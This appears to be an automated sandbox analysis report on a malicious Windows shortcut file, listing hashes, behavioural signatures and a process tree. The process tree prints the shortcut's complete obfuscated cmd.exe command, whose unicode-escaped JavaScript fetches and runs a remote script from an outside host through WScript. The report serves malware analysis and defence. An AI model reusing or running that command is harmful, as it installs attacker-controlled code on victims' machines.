Analysis
- max time kernel: 89s
- max time network: 149s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17/01/2024, 19:05
Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: 26586807.lnk, Resource: win7-20231215-en)
- Behavioral task: behavioral2 (Sample: 26586807.lnk, Resource: win10v2004-20231215-en)
General
- Target: 26586807.lnk
- Size: 1KB
- MD5: bc345cb4f475cf31bd47c9bbbeebc376
- SHA1: 53a989af0ea25a20c022db6d5cda0204dc53d0c5
- SHA256: 8051b39e71554eb5e1bb9455160957c5a5aae1e24f261052e8e871e93420adfc
- SHA512: 8e4eca9cdddd877c7db0411a3a809733660db7e8ebc877870a10b901beb97218b6bb586b5499dc14d3df831d9327fd0ab26b5f336a939997cccfc2bb6e4fc3ef
Malware Config
Signatures
- Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  6     3160  WScript.exe
  8     3160  WScript.exe
  12    3160  WScript.exe
- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                              Process
  Key value queried  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation  cmd.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation  cmd.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Modifies registry class (1 IoCs)
  description  ioc                                                                          Process
  Key created  \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings  cmd.exe
- Suspicious use of SetWindowsHookEx (1 IoCs)
  pid   Process
  4460  conhost.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  description                         pid   Process      procid_target
  PID 3900 wrote to memory of 4460    3900  cmd.exe      86
  PID 3900 wrote to memory of 4460    3900  cmd.exe      86
  PID 4460 wrote to memory of 1476    4460  conhost.exe  87
  PID 4460 wrote to memory of 1476    4460  conhost.exe  87
  PID 1476 wrote to memory of 8       1476  cmd.exe      90
  PID 1476 wrote to memory of 8       1476  cmd.exe      90
  PID 1476 wrote to memory of 548     1476  cmd.exe      89
  PID 1476 wrote to memory of 548     1476  cmd.exe      89
  PID 548 wrote to memory of 3160     548   cmd.exe      91
  PID 548 wrote to memory of 3160     548   cmd.exe      91
Processes (tree; each entry is image path, then command line, PID and matched signatures)
1. C:\Windows\system32\cmd.exe
   cmd /c C:\Users\Admin\AppData\Local\Temp\26586807.lnk
   PID: 3900
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "
      PID: 4460
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\cmd.exe
         C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "
         PID: 1476
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" caLl C:\XE9MHO\XBLOQECJ.JS"
            PID: 548
            - Checks computer location settings
            - Modifies registry class
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\System32\WScript.exe
               "C:\Windows\System32\WScript.exe" "C:\XE9MHO\XBLOQECJ.JS"
               PID: 3160
               - Blocklisted process makes network request
         4. C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); 0<nul 1>C:\XE9MHO\XBLOQECJ.JS"
            PID: 8
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 2KB
  MD5: 68495f1f190ec106bc741fca43f5f81e
  SHA1: 02f09cddc42fc54f1a00d908b3a82ac56e51039b
  SHA256: d112a97755429478ca7a78497feda6455fa490ed6509fcf27c88761e15da2168
  SHA512: e5e737d9b2ff69a88e88a2464f637026dd04dd2e9c2d8818d7ca70670bdff746de0ef105b011f5efa83b44eae0490731b6ae33ece1d57d1567d916baba020df1
- Filesize: 726B
  MD5: baeb441ed3f3f6093fa9383acd5dda33
  SHA1: edca2049e621cc283d4f05f674a118e0a0abdd52
  SHA256: d0d4de52e5c46d472172a68ad0c3dd5acf103cf986f7dea748ccd673f5efc592
  SHA512: 193bb9446a602ef4a63972864c4c8332397b427434e9b1a9a1507122e23b60275cbb177d29fba329832fcdefbd7ff8d3636db07a6d87cd0599a82dc903a39563